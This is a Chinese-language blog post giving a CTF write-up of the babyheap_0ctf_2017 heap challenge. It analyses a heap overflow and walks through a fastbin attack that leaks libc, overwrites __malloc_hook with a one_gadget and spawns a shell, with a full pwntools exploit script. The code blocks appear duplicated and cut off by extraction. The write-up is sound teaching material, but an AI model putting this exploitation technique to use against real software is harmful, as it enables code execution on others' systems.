<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
    <meta name="theme-color" content="#33363b">
    <meta name="msapplication-TileColor" content="#33363b">
    
    
    
    
    <meta name="keywords" content="Life, ARIA, Hexo">
    
    
    <link rel="apple-touch-icon" sizes="180x180" href="/LawlietLW.github.io/favicons/apple-touch-icon.png">
    
    
    <link rel="icon" type="image/png" sizes="192x192" href="/LawlietLW.github.io/favicons/android-chrome-192x192.png">
    
    
    <link rel="icon" type="image/png" sizes="32x32" href="/LawlietLW.github.io/favicons/favicon-32x32.png">
    
    
    <link rel="icon" type="image/png" sizes="16x16" href="/LawlietLW.github.io/favicons/favicon-16x16.png">
    
    
    <link rel="mask-icon" href="/LawlietLW.github.io/favicons/safari-pinned-tab.svg" color="#33363b">
    
    
    <link rel="manifest" href="/LawlietLW.github.io/favicons/site.webmanifest">
    
    
    <meta name="msapplication-config" content="/LawlietLW.github.io/favicons/browserconfig.xml">
    
    
    <link rel="alternate" href="/LawlietLW.github.io/atom.xml" title="Lock's blog" type="application/atom+xml" />
    
    
    <link rel="shortcut icon" type="image/x-icon" href="/LawlietLW.github.io/favicons/favicon.ico">
    
    
    <link rel="stylesheet" type="text/css" href="/LawlietLW.github.io/css/normalize.css">
    <link rel="stylesheet" type="text/css" href="/LawlietLW.github.io/css/index.css">
    
    <link rel="stylesheet" type="text/css" href="/LawlietLW.github.io/css/sidebar.css">
    
    
<link rel="stylesheet" type="text/css" href="/LawlietLW.github.io/css/page.css">
<link rel="stylesheet" type="text/css" href="/LawlietLW.github.io/css/post.css">

    <link rel="stylesheet" type="text/css" href="/LawlietLW.github.io/css/custom.css">
    <link rel="stylesheet" type="text/css" href="/LawlietLW.github.io/css/atom-one-dark.css">
    <link rel="stylesheet" type="text/css" href="/LawlietLW.github.io/css/lightgallery.min.css">
    <script type="text/javascript" src="/LawlietLW.github.io/js/jquery.min.js"></script>
    <script defer type="text/javascript" src="/LawlietLW.github.io/js/util.js"></script>
    <script defer type="text/javascript" src="/LawlietLW.github.io/js/clipboard.min.js"></script>
    <script defer type="text/javascript" src="/LawlietLW.github.io/js/scrollspy.js"></script>
    <script defer type="text/javascript" src="/LawlietLW.github.io/js/fontawesome-all.min.js"></script>
    <script defer type="text/javascript" src="/LawlietLW.github.io/js/lightgallery.min.js"></script>
    <script defer type="text/javascript" src="/LawlietLW.github.io/js/lg-fullscreen.min.js"></script>
    <script defer type="text/javascript" src="/LawlietLW.github.io/js/lg-hash.min.js"></script>
    <script defer type="text/javascript" src="/LawlietLW.github.io/js/lg-pager.min.js"></script>
    <script defer type="text/javascript" src="/LawlietLW.github.io/js/lg-thumbnail.min.js"></script>
    <script defer type="text/javascript" src="/LawlietLW.github.io/js/lg-zoom.min.js"></script>
    
    <script defer src="/LawlietLW.github.io/js/busuanzi.pure.mini.js"></script>
    
    
    <script defer type="text/javascript" src="/LawlietLW.github.io/js/search.js"></script>
    <script type="text/javascript">
    $(document).ready(function () {
      var searchPath = "search.xml";
      if (searchPath.length === 0) {
        searchPath = "search.xml";
      }
      var path = "/LawlietLW.github.io/" + searchPath;
      searchFunc(path, "search-input", "search-result");
    });
    </script>
    
    
    <script defer type="text/javascript" src="/LawlietLW.github.io/js/index.js"></script>
    <script type="text/javascript">
    $(document).ready(function () {
      var cb = null;
      var els = $(".post figure.highlight");
      if (els.length) {
        // Enabled Hexo highlight line number.
        $(els).each(function (i, e) {
          // $(e).before("<button class=\"copy button\">複製</button>");
          $(e).before([
            "<div class=\"code-titlebar\">",
              "<div class=\"titlebar-left\">",
                "<button class=\"copy\" aria-label=\"複製\"><i class=\"far fa-copy\"></i></button>",
              "</div>",
              "<div class=\"titlebar-center\">",
                "code",
              "</div>",
              "<div class=\"titlebar-right\">",
                "<button class=\"button-dot dot-minimize\" aria-label=\"Decoration\"></button>",
                "<button class=\"button-dot dot-maximize\" aria-label=\"Decoration\"></button>",
                "<button class=\"button-dot dot-close\" aria-label=\"Decoration\"></button>",
              "</div>",
            "</div>"
          ].join(""));
        });
        cb = new ClipboardJS("button.copy", {
          "target": function (trigger) {
              // Get target element by DOM API.
              return trigger.parentNode.parentNode.nextElementSibling.firstChild.firstChild.firstChild.lastChild.firstChild.firstChild;
          }
        });
      } else {
        // Disabled Hexo highlight line number.
        els = $(".post pre code");
        $(els).each(function (i, e) {
          // Add button before pre, not code.
          // $(e).parent().before("<button class=\"copy button\">複製</button>");
          $(e).before([
            "<div class=\"code-titlebar\">",
              "<div class=\"titlebar-left\">",
                "<button class=\"copy\" aria-label=\"複製\"><i class=\"far fa-copy\"></i></button>",
              "</div>",
              "<div class=\"titlebar-center\">",
                "code",
              "</div>",
              "<div class=\"titlebar-right\">",
                "<button class=\"button-dot dot-minimize\" aria-label=\"Decoration\"></button>",
                "<button class=\"button-dot dot-maximize\" aria-label=\"Decoration\"></button>",
                "<button class=\"button-dot dot-close\" aria-label=\"Decoration\"></button>",
              "</div>",
            "</div>"
          ].join(""));
        });
        cb = new ClipboardJS("button.copy", {
          "target": function (trigger) {
              // Get target element by DOM API.
              return trigger.parentNode.parentNode.nextElementSibling;
          }
        });
      }
      cb.on("success", function (e) {
        e.clearSelection();
        var trigger = e.trigger;
        // Change button text as a user tip.
        trigger.innerHTML = "<i class=\"far fa-check-square\"></i>";
        $(trigger).addClass("copied");
        // Change button text back;
        setTimeout(function () {
          trigger.innerHTML = "<i class=\"far fa-copy\"></i>";
          $(trigger).removeClass("copied");
        }, 1500);
      });
    });
    </script>
    
    <script defer type="text/javascript" src="/LawlietLW.github.io/js/custom.js"></script>
    <title>babyheap_0ctf_2017 | Lock's blog</title>
  <meta name="generator" content="Hexo 4.1.1"><link rel="stylesheet" href="/LawlietLW.github.io/css/prism-tomorrow.css" type="text/css"></head>
  <body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN"  data-spy="scroll" data-target=".list-group">
    
<header id="header" class="header" style="background: #33363b;">
  <div class="container">
    <div class="header-container">
      <div class="header-title">
        <h1 class="title"><a href="/LawlietLW.github.io/">Lock's blog</a></h1>
        <h2 class="subtitle"></h2>
      </div>
      
      <div class="logo">
        <img src="/LawlietLW.github.io/images/logo.png" alt="logo">
      </div>
      
    </div>
    <nav id="nav" class="nav">
      <a id="nav-toggle" class="nav-toggle" aria-hidden="true"><i class="fas fa-bars" aria-label="切換導航欄"></i></a>
      <ul id="menu" role="menubar" aria-hidden="false">
        
        <li role="menuitem"><a href="/LawlietLW.github.io/"><i class="fas fa-home"></i><span class="menu-text">首頁</span></a></li>
        
        <li role="menuitem"><a href="/LawlietLW.github.io/archives/"><i class="fas fa-archive"></i><span class="menu-text">歸檔</span></a></li>
        
        <li role="menuitem"><a href="/LawlietLW.github.io/categories/"><i class="fas fa-th-list"></i><span class="menu-text">分類</span></a></li>
        
        <li role="menuitem"><a href="/LawlietLW.github.io/tags/"><i class="fas fa-tags"></i><span class="menu-text">標籤</span></a></li>
        
        <li role="menuitem"><a href="/LawlietLW.github.io/about/"><i class="fas fa-user-edit"></i><span class="menu-text">關於</span></a></li>
        
      </ul>
    </nav>
  </div>
</header>


    <main id="main" class="main">
      <div class="container">
        <div class="main-container">
          <div class="content">
            
<div id="post" class="page">
  
  <article class="article post card" itemscope itemtype="http://schema.org/Article">
    <div class="post-block">
      <link itemprop="mainEntityOfPage" href="http://LawlietLW.github.io/LawlietLW.github.io/2020/02/01/babyheap-0ctf-2017/">
      <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
       <meta itemprop="name" content="Lock">
       <meta itemprop="description" content="">
       <meta itemprop="image" content="/LawlietLW.github.io/images/1.jpeg">
      </span>
      <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
       <meta itemprop="name" content="Lock's blog">
      </span>
    </div>
    <header class="post-header">
      <h1 class="post-title" itemprop="name headline">babyheap_0ctf_2017</h1>
      <div class="post-meta">
        
        <span class="post-date">
          <i class="far fa-calendar-plus"></i><span><time title="post-date" itemprop="dateCreated datePublished" datetime="2020-02-01T10:17:37+08:00">2020-02-01 10:17:37</time></span>
        </span>
        
        
        
        <span class="post-meta-divider divider">|</span>
        
        <span class="post-categories">
          
          <i class="far fa-folder-open"></i><span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/LawlietLW.github.io/categories/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a></span>
        </span>
        
        
      </div>
    </header>
    <main class="post-main" itemprop="articleBody">
      <p>这两天学习了一些堆的知识，趁热记录一下<br>首先还是熟练的checksec<br><img src="/LawlietLW.github.io/2020/02/01/babyheap-0ctf-2017/1.jpg" alt=""><br>保护全开，堆题正常操作<br>IDA分析一波<br><img src="/LawlietLW.github.io/2020/02/01/babyheap-0ctf-2017/2.jpg" alt=""><br>四个功能，增删查改<br>依次进入每个功能查看，首先是Allocate功能<br><img src="/LawlietLW.github.io/2020/02/01/babyheap-0ctf-2017/3.jpg" alt=""><br>最大分配16个<br>size最大为4096个字节，通过calloc分配堆，calloc与malloc的区别在于<br>calloc 会将分配的内存空间每一位都初始化为0<br><img src="/LawlietLW.github.io/2020/02/01/babyheap-0ctf-2017/4.jpg" alt=""><br>这三行代码分别代表flag位，分配即被置1；分配的字节大小；所分配的堆的指针<br>所以转换成结构体即为</p>
<figure class="hljs highlight c"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre class=" language-hljs c"><span class="hljs-class"><span class="hljs-keyword">struct</span>{</span><br>    <span class="hljs-keyword">int</span> flag;<br>    <span class="hljs-keyword">int</span> lenth;<br>    <span class="hljs-keyword">char</span>*content;<br>}note[<span class="hljs-number"><code class="language-hljs c"><span class="hljs-class"><span class="hljs-keyword">struct</span>{</span><br>    <span class="hljs-keyword">int</span> flag;<br>    <span class="hljs-keyword">int</span> lenth;<br>    <span class="hljs-keyword">char</span>*content;<br>}note[<span class="hljs-number">16</span>]<br></code></pre></td></tr></tbody></table></figure>

<p>再看到Fill功能<br><img src="/LawlietLW.github.io/2020/02/01/babyheap-0ctf-2017/5.jpg" alt=""><br>首先判断输入的index是否位于0到15之间并且是否被分配<br>如果是的话则输入content的size<br>漏洞点就在这里，程序并没有判断content的size是否小于我们之前输入的堆的size，如果我们输入更大的size，就可以造成堆溢出</p>
<p>再看到Free功能<br><img src="/LawlietLW.github.io/2020/02/01/babyheap-0ctf-2017/6.jpg" alt=""><br>一开始还是先判断是否存在<br>然后清零所有的数据，并且指针也置NULL<br>free功能并没有漏洞</p>
<p>最后一个dump功能<br><img src="/LawlietLW.github.io/2020/02/01/babyheap-0ctf-2017/7.jpg" alt=""><br>和上面一样，先判断，然后打印对应序号的堆的内容，没啥问题</p>
<p>功能分析完后就开始分析漏洞点<br>Fill功能存在堆溢出漏洞，而free功能既没有UAF漏洞也没有double free漏洞，所以这题不能利用常规的通过unsorted bin来泄露libc地址的方法，而是要利用fastbin attack中的一种叫做chunk extend的方法来泄露地址，在这里贴上我看到的一个讲解的很好的链接<a href="https://blog.csdn.net/Breeze_CAT/article/details/103788698" target="_blank" rel="noopener">fastbin attack详解</a><br>首先把重复操作封装成函数</p>
<figure class="hljs highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre class=" language-hljs python"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">alloc</span><span class="hljs-params">(size)</span>:</span><br>    io.recvuntil(<span class="hljs-string">"Command: "</span>)<br>    io.sendline(<span class="hljs-string">'1'</span>)<br>    io.recvuntil(<span class="hljs-string">"Size: "</span>)<br>    io.sendline(str(size))<br><br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">fill</span><span class="hljs-params">(index, content)</span>:</span><br>    io.recvuntil(<span class="hljs-string">"Command: "</span>)<br>    io.sendline(<span class="hljs-string">'2'</span>)<br>    io.recvuntil(<span class="hljs-string">"Index: "</span>)<br>    io.sendline(str(index))<br>    io.recvuntil(<span class="hljs-string">"Size: "</span>)<br>    io.sendline(str(len(content)))<br>    io.recvuntil(<span class="hljs-string">"Content: "</span>)<br>    io.send(content)<br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">free</span><span class="hljs-params">(index)</span>:</span><br>    io.recvuntil(<span class="hljs-string">"Command: "</span>)<br>    io.sendline(<span class="hljs-string">'3'</span>)<br>    io.recvuntil(<span class="hljs-string">"Index: "</span>)<br>    io.sendline(str(index))<br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">dump</span><span class="hljs-params">(index)</span>:</span><br>    io.recvuntil(<span class="hljs-string">"Command: "</span>)<br>    io.sendline(<span class="hljs-string">'4'</span>)<br>    io.recvuntil(<span class="hljs-string">"Index: "</span>)<br>    io.sendline(str(index))<br>    io.recvuntil(<span class="hljs-string">"Content: \n"</span>)<br>    data=io.recvline()<br>    <span class="hljs-keyword"><code class="language-hljs python"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">alloc</span><span class="hljs-params">(size)</span>:</span><br>    io.recvuntil(<span class="hljs-string">"Command: "</span>)<br>    io.sendline(<span class="hljs-string">'1'</span>)<br>    io.recvuntil(<span class="hljs-string">"Size: "</span>)<br>    io.sendline(str(size))<br><br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">fill</span><span class="hljs-params">(index, content)</span>:</span><br>    io.recvuntil(<span class="hljs-string">"Command: "</span>)<br>    io.sendline(<span class="hljs-string">'2'</span>)<br>    io.recvuntil(<span class="hljs-string">"Index: "</span>)<br>    io.sendline(str(index))<br>    io.recvuntil(<span class="hljs-string">"Size: "</span>)<br>    io.sendline(str(len(content)))<br>    io.recvuntil(<span class="hljs-string">"Content: "</span>)<br>    io.send(content)<br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">free</span><span class="hljs-params">(index)</span>:</span><br>    io.recvuntil(<span class="hljs-string">"Command: "</span>)<br>    io.sendline(<span class="hljs-string">'3'</span>)<br>    io.recvuntil(<span class="hljs-string">"Index: "</span>)<br>    io.sendline(str(index))<br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">dump</span><span class="hljs-params">(index)</span>:</span><br>    io.recvuntil(<span class="hljs-string">"Command: "</span>)<br>    io.sendline(<span class="hljs-string">'4'</span>)<br>    io.recvuntil(<span class="hljs-string">"Index: "</span>)<br>    io.sendline(str(index))<br>    io.recvuntil(<span class="hljs-string">"Content: \n"</span>)<br>    data=io.recvline()<br>    <span class="hljs-keyword">return</span> data<br></code></pre></td></tr></tbody></table></figure>
<p>在本题中，按照攻击思想，首先alloc4个堆</p>
<figure class="hljs highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre class=" language-hljs python">alloc(<span class="hljs-number">0x18</span>)<span class="hljs-comment">#0</span><br>alloc(<span class="hljs-number">0x68</span>)<span class="hljs-comment">#1</span><br>alloc(<span class="hljs-number">0x68</span>)<span class="hljs-comment">#2</span><br>alloc(<span class="hljs-number">0x18</span>)<span class="hljs-comment"><code class="language-hljs python">alloc(<span class="hljs-number">0x18</span>)<span class="hljs-comment">#0</span><br>alloc(<span class="hljs-number">0x68</span>)<span class="hljs-comment">#1</span><br>alloc(<span class="hljs-number">0x68</span>)<span class="hljs-comment">#2</span><br>alloc(<span class="hljs-number">0x18</span>)<span class="hljs-comment">#3</span><br></code></pre></td></tr></tbody></table></figure>
<p>alloc0x18实际上分配了0x20大小的堆，alloc0x68实际上分配了0x70大小的堆<br>然后我们fill0号堆，造成单字节溢出，即溢出到1号堆的size位，修改size为size(1)+size(2)，即0xe1(1为上一个堆是否处于分配状态的标志位)</p>
<figure class="hljs highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre class=" language-hljs python">payload=<span class="hljs-string">'A'</span>*<span class="hljs-number">0x18</span><br>payload+=p8(<span class="hljs-number">0xe1</span>)<br>fill(<span class="hljs-number"><code class="language-hljs python">payload=<span class="hljs-string">'A'</span>*<span class="hljs-number">0x18</span><br>payload+=p8(<span class="hljs-number">0xe1</span>)<br>fill(<span class="hljs-number">0</span>,payload)<br></code></pre></td></tr></tbody></table></figure>
<p>这样1号堆实际上就包括了1号堆和2号堆，属于small chunk.接下来我们free1号堆，当1号堆被free之后，按照规定会被放入unsorted bin当中，大小为0xe1,此时1号堆的fd和bk指针都存放着unsorted bin的表头<br>(需要注意，free掉1号堆后，实际上2号堆仍然处于已分配状态)<br>然后我们再alloc一个大小为0x60的堆，这样就从unsorted bin当中割除一块，即割除了原本属于1号堆的那一块分配给了新堆，剩下的那一块就是属于2号堆的那一块，unsorted bin的表头的转移到了2号堆的fd和bk当中<br>而2号堆仍然处于使用状态，这样我们就可以通过dump操作泄露出libc</p>
<figure class="hljs highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre class=" language-hljs python">free(<span class="hljs-number">1</span>)<br>alloc(<span class="hljs-number">0x68</span>)<span class="hljs-comment">#1</span><br>leak=u64(dump(<span class="hljs-number">2</span>)[:<span class="hljs-number"><code class="language-hljs python">free(<span class="hljs-number">1</span>)<br>alloc(<span class="hljs-number">0x68</span>)<span class="hljs-comment">#1</span><br>leak=u64(dump(<span class="hljs-number">2</span>)[:<span class="hljs-number">8</span>])<br></code></pre></td></tr></tbody></table></figure>
<p><img src="/LawlietLW.github.io/2020/02/01/babyheap-0ctf-2017/8.jpg" alt=""><br>偏移为0x7f5a68c3db78-0x7f5a68879000=0x3C4B78‬</p>
<figure class="hljs highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre class=" language-hljs python">libc=leak<span class="hljs-number">-0x3c4b78</span><br>__malloc_hook=libc+<span class="hljs-number">0x3c4b10</span><br>one_gadget=libc+<span class="hljs-number">0x4526a</span><br>log.info(<span class="hljs-string">"leak =&gt; 0x%x"</span> % leak)<br>log.info(<span class="hljs-string">"libc =&gt; 0x%x"</span> % libc)<br>log.info(<span class="hljs-string">"__malloc_hook =&gt; 0x%x"</span> % __malloc_hook)<br>log.info(<span class="hljs-string"><code class="language-hljs python">libc=leak<span class="hljs-number">-0x3c4b78</span><br>__malloc_hook=libc+<span class="hljs-number">0x3c4b10</span><br>one_gadget=libc+<span class="hljs-number">0x4526a</span><br>log.info(<span class="hljs-string">"leak =&gt; 0x%x"</span> % leak)<br>log.info(<span class="hljs-string">"libc =&gt; 0x%x"</span> % libc)<br>log.info(<span class="hljs-string">"__malloc_hook =&gt; 0x%x"</span> % __malloc_hook)<br>log.info(<span class="hljs-string">"one_gadget => 0x%x"</span> % one_gadget)<br></code></pre></td></tr></tbody></table></figure>
<p>泄露出libc地址后，利用就已经完成了一大半了<br>由于开启了Full RELRO，复写got表就不可行了，我们这里可通过覆盖__malloc_hook指针为one_gadget来起shell</p>
<figure class="hljs highlight bash"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre class=" language-hljs bash"><code class="language-hljs bash">malloc_hook<br>最常见也是最容易的一种堆利用方法。<br>malloc函数会首先检查malloc_hook的值，若不为0则会调用他。若我们能通过内存写入malloc_hook即可实现任意地址跳转<br>通过fastbin_attack攻击malloc_hook<br></code></pre></td></tr></tbody></table></figure>
<p>观察一下malloc_hook周围的数据的分布<br><img src="/LawlietLW.github.io/2020/02/01/babyheap-0ctf-2017/9.jpg" alt=""><br>似乎并没有满足条件fastbin条件的数据，但只要我们稍微调整一下数据分布，看到__malloc_hook-0x23<br><img src="/LawlietLW.github.io/2020/02/01/babyheap-0ctf-2017/10.jpg" alt=""><br>7f正好满足fastbin大小的限制，如图所示<br><img src="/LawlietLW.github.io/2020/02/01/babyheap-0ctf-2017/11.jpg" alt=""><br>补充好相应的知识以后，就可以开始构造了<br>我们再alloc一个0x60大小的4号堆，实际上4号堆和2号堆是公用的<br>然后free掉2号堆，这个时候bins如下<br><img src="/LawlietLW.github.io/2020/02/01/babyheap-0ctf-2017/12.jpg" alt=""><br>我们再通过fill4号堆把2号堆的fd指针指向mallac_hook-0x23处</p>
<figure class="hljs highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre class=" language-hljs python">alloc(<span class="hljs-number">0x68</span>)<br>free(<span class="hljs-number">2</span>)<br>payload=p64(__malloc_hook<span class="hljs-number">-0x23</span>)<br>fill(<span class="hljs-number"><code class="language-hljs python">alloc(<span class="hljs-number">0x68</span>)<br>free(<span class="hljs-number">2</span>)<br>payload=p64(__malloc_hook<span class="hljs-number">-0x23</span>)<br>fill(<span class="hljs-number">4</span>,payload)<br></code></pre></td></tr></tbody></table></figure>
<p>看看现在的bins<br><img src="/LawlietLW.github.io/2020/02/01/babyheap-0ctf-2017/13.jpg" alt=""><br>指向了<strong>malloc_hook-0x23处，我们只需要alloc2次，就能把堆分配到</strong>malloc_hook-0x23</p>
<figure class="hljs highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre class=" language-hljs python">alloc(<span class="hljs-number">0x68</span>)<br>alloc(<span class="hljs-number"><code class="language-hljs python">alloc(<span class="hljs-number">0x68</span>)<br>alloc(<span class="hljs-number">0x68</span>)<br></code></pre></td></tr></tbody></table></figure>
<p>接下来就只需要按照上面关于的<strong>malloc_hook的图进行填充即可，把one_gadget的地址填入</strong>malloc_hook处，然后再alloc任意大小的堆即可触发one_gadget从而拿到shell</p>
<figure class="hljs highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre class=" language-hljs python">payload=<span class="hljs-string">'b'</span>*<span class="hljs-number">0x13</span>+p64(one_gadget)<br>fill(<span class="hljs-number">5</span>,payload)<br><br>alloc(<span class="hljs-number"><code class="language-hljs python">payload=<span class="hljs-string">'b'</span>*<span class="hljs-number">0x13</span>+p64(one_gadget)<br>fill(<span class="hljs-number">5</span>,payload)<br><br>alloc(<span class="hljs-number">1</span>)<br>io.interactive()<br></code></pre></td></tr></tbody></table></figure>
<p>完整exp如下</p>
<figure class="hljs highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br></pre></td><td class="code"><pre class=" language-hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-comment">#context.log_level = "debug"</span><br>io = process(<span class="hljs-string">'./babyheap_0ctf_2017'</span>)<br><span class="hljs-comment">#io=remote('node3.buuoj.cn',29849)</span><br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">alloc</span><span class="hljs-params">(size)</span>:</span><br>    io.recvuntil(<span class="hljs-string">"Command: "</span>)<br>    io.sendline(<span class="hljs-string">'1'</span>)<br>    io.recvuntil(<span class="hljs-string">"Size: "</span>)<br>    io.sendline(str(size))<br><br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">fill</span><span class="hljs-params">(index, content)</span>:</span><br>    io.recvuntil(<span class="hljs-string">"Command: "</span>)<br>    io.sendline(<span class="hljs-string">'2'</span>)<br>    io.recvuntil(<span class="hljs-string">"Index: "</span>)<br>    io.sendline(str(index))<br>    io.recvuntil(<span class="hljs-string">"Size: "</span>)<br>    io.sendline(str(len(content)))<br>    io.recvuntil(<span class="hljs-string">"Content: "</span>)<br>    io.send(content)<br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">free</span><span class="hljs-params">(index)</span>:</span><br>    io.recvuntil(<span class="hljs-string">"Command: "</span>)<br>    io.sendline(<span class="hljs-string">'3'</span>)<br>    io.recvuntil(<span class="hljs-string">"Index: "</span>)<br>    io.sendline(str(index))<br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">dump</span><span class="hljs-params">(index)</span>:</span><br>    io.recvuntil(<span class="hljs-string">"Command: "</span>)<br>    io.sendline(<span class="hljs-string">'4'</span>)<br>    io.recvuntil(<span class="hljs-string">"Index: "</span>)<br>    io.sendline(str(index))<br>    io.recvuntil(<span class="hljs-string">"Content: \n"</span>)<br>    data=io.recvline()<br>    <span class="hljs-keyword">return</span> data<br><br>alloc(<span class="hljs-number">0x18</span>)<br>alloc(<span class="hljs-number">0x68</span>)<br>alloc(<span class="hljs-number">0x68</span>)<br>alloc(<span class="hljs-number">0x18</span>)<br><br>payload=<span class="hljs-string">'A'</span>*<span class="hljs-number">0x18</span><br>payload+=p8(<span class="hljs-number">0xe1</span>)<br>fill(<span class="hljs-number">0</span>,payload)<br>free(<span class="hljs-number">1</span>)<br><br>alloc(<span class="hljs-number">0x68</span>)<br>leak=u64(dump(<span class="hljs-number">2</span>)[:<span class="hljs-number">8</span>])<br>libc=leak<span class="hljs-number">-0x3c4b78</span><br>__malloc_hook=libc+<span class="hljs-number">0x3c4b10</span><br>one_gadget=libc+<span class="hljs-number">0x4526a</span><br>log.info(<span class="hljs-string">"leak =&gt; 0x%x"</span> % leak)<br>log.info(<span class="hljs-string">"libc =&gt; 0x%x"</span> % libc)<br>log.info(<span class="hljs-string">"__malloc_hook =&gt; 0x%x"</span> % __malloc_hook)<br>log.info(<span class="hljs-string">"one_gadget =&gt; 0x%x"</span> % one_gadget)<br><br>alloc(<span class="hljs-number">0x68</span>)<br>free(<span class="hljs-number">2</span>)<br>payload=p64(__malloc_hook<span class="hljs-number">-0x23</span>)<br>fill(<span class="hljs-number">4</span>,payload)<br>alloc(<span class="hljs-number">0x68</span>)<br>alloc(<span class="hljs-number">0x68</span>)<br><br>payload=<span class="hljs-string">'b'</span>*<span class="hljs-number">0x13</span>+p64(one_gadget)<br>fill(<span class="hljs-number">5</span>,payload)<br><br>alloc(<span class="hljs-number"><code class="language-hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-comment">#context.log_level = "debug"</span><br>io = process(<span class="hljs-string">'./babyheap_0ctf_2017'</span>)<br><span class="hljs-comment">#io=remote('node3.buuoj.cn',29849)</span><br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">alloc</span><span class="hljs-params">(size)</span>:</span><br>    io.recvuntil(<span class="hljs-string">"Command: "</span>)<br>    io.sendline(<span class="hljs-string">'1'</span>)<br>    io.recvuntil(<span class="hljs-string">"Size: "</span>)<br>    io.sendline(str(size))<br><br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">fill</span><span class="hljs-params">(index, content)</span>:</span><br>    io.recvuntil(<span class="hljs-string">"Command: "</span>)<br>    io.sendline(<span class="hljs-string">'2'</span>)<br>    io.recvuntil(<span class="hljs-string">"Index: "</span>)<br>    io.sendline(str(index))<br>    io.recvuntil(<span class="hljs-string">"Size: "</span>)<br>    io.sendline(str(len(content)))<br>    io.recvuntil(<span class="hljs-string">"Content: "</span>)<br>    io.send(content)<br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">free</span><span 